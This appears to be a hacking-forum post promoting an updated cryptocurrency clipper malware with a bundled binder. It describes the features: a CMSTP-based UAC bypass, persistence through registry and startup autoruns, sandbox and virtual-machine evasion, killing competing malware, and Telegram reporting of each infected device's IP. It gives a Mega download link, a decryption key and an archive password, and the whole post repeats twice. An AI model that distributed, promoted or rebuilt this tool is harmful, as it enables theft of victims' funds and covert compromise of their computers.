OP 20 March, 2024 - 04:28 AM
(This post was last modified: 06 May, 2024 - 06:55 PM by angelbanker. Edited 1 time in total.)
Update v2
I and my team agreed on adding a binder to the clipper, everyone gave the okay, the binder was successfully added
Basic Binder Functions:
Implementation paths
1) Temp
2) AppData
3) UserProfile
4) AllUserprofile
5) Public
6) ProgramData
7) LocalAppdata
8) WinDir
9) System32
10) Current
11) Desktop
12) Startup
13) ProgramFiles
You can also use custom injection to any folder using uac bypass functions.
Normal startup - true/false
Single startup - true/false
Critical hiding - true/false
Autorun from registry editor - true/false
Add your loopback to allowed threats - true/false
Autorun for your Task Manager bind file - true/false
Functions to stub your clipper:
UAC bypass
Request to run the stub with administrator privileges
Kill bots (malware listed by code, kills by pid or mutex)
Skip virus environments VMware, Vbox, Hyper V, sandbox, etc.
Clipper:
Added a function for clipper to send logs to telegram about a new infected device
The telegram logging code sets certain parameters for ServicePoingManager, the parameters are set to control the behavior of network requests
In the code you will see in clipper, this parameter will handle up to 100-continue headers
Next the code uses WebClient to make an HTTP request to an external server, the external request is (ip.com and telegram API), ip.com is needed for logging, it will show the IP of the infected device in the logs.
In the end the code uses Telegram BOT api to send logs
![[Image: Shooter-Screenshot-286-19-03-24.png]](https://i.ibb.co/cFjBFVm/Shooter-Screenshot-286-19-03-24.png)
Fixed UAC bypass function
BinaryPath - string variable containing path to executable file
CMSTP.exe - Windows system file
The Code method is a method that returns a string representing the instructions for the INF configuration file. This file is used to set certain parameters on the system
SetInfFile(pp) is an external method or function that generates a string of settings for the INF file based on some input parameter pp of the CMSTP.exe bypass manipulator
The code has strings such as flag
The flag variable is set to True if the cmstp.exe file does not exist in the specified path (BinaryPath). This is checked with File.Exists(BinaryPath).
If flag and flag2 are both True, then False is returned
This means that if the cmstp.exe file does not exist, the program terminates execution and returns False.
HM headers that return TRUE after running cmstp.exe with certain permissions, helps to bypass UAC.
![[Image: Shooter-Screenshot-284-19-03-24.png]](https://i.ibb.co/7KB3Lys/Shooter-Screenshot-284-19-03-24.png)
![[Image: Shooter-Screenshot-285-19-03-24.png]](https://i.ibb.co/GnVKWc3/Shooter-Screenshot-285-19-03-24.png)
Download link: https://mega.nz/file/lSlzHILB
Mega key: PfYgeGLzCXUFs46lTZ3Arc5kFxIWnN5y-oWjxRp_O2s
Password for 7z: RooseveltRow
I and my team agreed on adding a binder to the clipper, everyone gave the okay, the binder was successfully added
Basic Binder Functions:
Implementation paths
1) Temp
2) AppData
3) UserProfile
4) AllUserprofile
5) Public
6) ProgramData
7) LocalAppdata
8) WinDir
9) System32
10) Current
11) Desktop
12) Startup
13) ProgramFiles
You can also use custom injection to any folder using uac bypass functions.
Normal startup - true/false
Single startup - true/false
Critical hiding - true/false
Autorun from registry editor - true/false
Add your loopback to allowed threats - true/false
Autorun for your Task Manager bind file - true/false
Functions to stub your clipper:
UAC bypass
Request to run the stub with administrator privileges
Kill bots (malware listed by code, kills by pid or mutex)
Skip virus environments VMware, Vbox, Hyper V, sandbox, etc.
Clipper:
Added a function for clipper to send logs to telegram about a new infected device
The telegram logging code sets certain parameters for ServicePoingManager, the parameters are set to control the behavior of network requests
In the code you will see in clipper, this parameter will handle up to 100-continue headers
Next the code uses WebClient to make an HTTP request to an external server, the external request is (ip.com and telegram API), ip.com is needed for logging, it will show the IP of the infected device in the logs.
In the end the code uses Telegram BOT api to send logs
Fixed UAC bypass function
BinaryPath - string variable containing path to executable file
CMSTP.exe - Windows system file
The Code method is a method that returns a string representing the instructions for the INF configuration file. This file is used to set certain parameters on the system
SetInfFile(pp) is an external method or function that generates a string of settings for the INF file based on some input parameter pp of the CMSTP.exe bypass manipulator
The code has strings such as flag
The flag variable is set to True if the cmstp.exe file does not exist in the specified path (BinaryPath). This is checked with File.Exists(BinaryPath).
If flag and flag2 are both True, then False is returned
This means that if the cmstp.exe file does not exist, the program terminates execution and returns False.
HM headers that return TRUE after running cmstp.exe with certain permissions, helps to bypass UAC.
Download link: https://mega.nz/file/lSlzHILB
Mega key: PfYgeGLzCXUFs46lTZ3Arc5kFxIWnN5y-oWjxRp_O2s
Password for 7z: RooseveltRow
![[Image: XOBfHof.gif]](https://i.imgur.com/XOBfHof.gif)
![[Image: 818lQIv.gif]](https://i.imgur.com/818lQIv.gif)
![[Image: Shooter-Screenshot-155-11-03-24.png]](https://i.ibb.co/k35ZDbH/Shooter-Screenshot-155-11-03-24.png)
![[Image: Shooter-Screenshot-156-11-03-24.png]](https://i.ibb.co/PWFV0YN/Shooter-Screenshot-156-11-03-24.png)
![[Image: Shooter-Screenshot-153-11-03-24.png]](https://i.ibb.co/WV3Zs3J/Shooter-Screenshot-153-11-03-24.png)
![[Image: is00n.jpg]](https://i.ibb.co/fqNBTqF/is00n.jpg)
![[Image: 1.jpg]](https://i.ibb.co/kcXKS6S/1.jpg)